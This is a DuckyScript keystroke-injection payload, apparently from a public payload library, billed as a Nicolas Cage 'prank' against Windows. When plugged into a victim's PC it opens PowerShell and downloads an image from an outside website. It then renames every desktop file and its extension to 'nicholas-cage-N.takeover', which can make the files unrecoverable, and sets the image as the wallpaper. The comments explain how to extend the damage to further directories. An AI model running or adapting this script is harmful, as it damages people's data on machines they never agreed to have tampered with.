Path: blob/master/payloads/library/prank/A_Cagey_Takeover/payload.txt
2968 views
REM Title: A_Cagey_Takeover1REM Author: the-jcksn2REM Description: Nicolas Cage themed Prank - Renames all files on desktop as "nicholas-cage-1.takeover", incrementing the digit. Then sets background image to nicholas cage breaking through the screen. Can be expanded to remane files in further directories if required.3REM Target: Windows / Powershell4REM Version: 1.05REM Category: Prank67REM ~~~~~ TO DESTROY FURTHER FILENAMES: Copy everything from line 23 to 28, and paste in the space provided, changing the target directory name.8REM ~~~~~ CAN RUN SCRIPT 'AS IS' (WITHOUT CHANGES) - Will just attack files on the desktop9REM ~~~~~ Use responsibly and within the confines of the law. This script renames files AND extensions and can result in being unable to access files if you don't know which file was which. I accept no responsibility for any loss of files or any other consequences. Use at your own risk.10DELAY 100011GUI r12DELAY 20013STRING powershell14ENTER15DELAY 20016STRING Invoke-WebRequest -Uri https://wallpapercave.com/wp/GVO9gKu.jpg -OutFile Desktop\nickcage.jpg17ENTER18DELAY 10001920REM ~~~~~~~~~~ REPEAT THE BELOW LINES IF YOU WANT TO NICK TO TAKEOVER FURTHER DIRECTORIES, CHANGING "cd Desktop" TO THE DIRECTORY REQUIRED ~~~~~~~~~~2122STRING cd Desktop23ENTER24DELAY 20025STRING dir | %{Rename-Item $_ -NewName ("nicholas-cage-{0}.takeover" -f $nr++)}26ENTER27DELAY 2002829REM ~~~~~~~~~~ END OF LINES TO REPEAT ~~~~~~~~~~3031REM SPACE TO PASTE FURTHER TAKEOVERS (YOU CAN DELETE THIS LINE IF DESIRED)3233REM ~~~~~~~~~~ BACK TO BUSINESS, DONT CHANGE ANYTHING BELOW THIS ~~~~~~~~~~34STRING exit35ENTER36DELAY 20037GUI r38DELAY 20039STRING Desktop40ENTER41DELAY 20042CTRL f43DELAY 50044STRING nickcage45ENTER46DELAY 80047TAB48DELAY 20049SPACE50DELAY 20051MENU52DELAY 20053STRING b54DELAY 20055ALT F4565758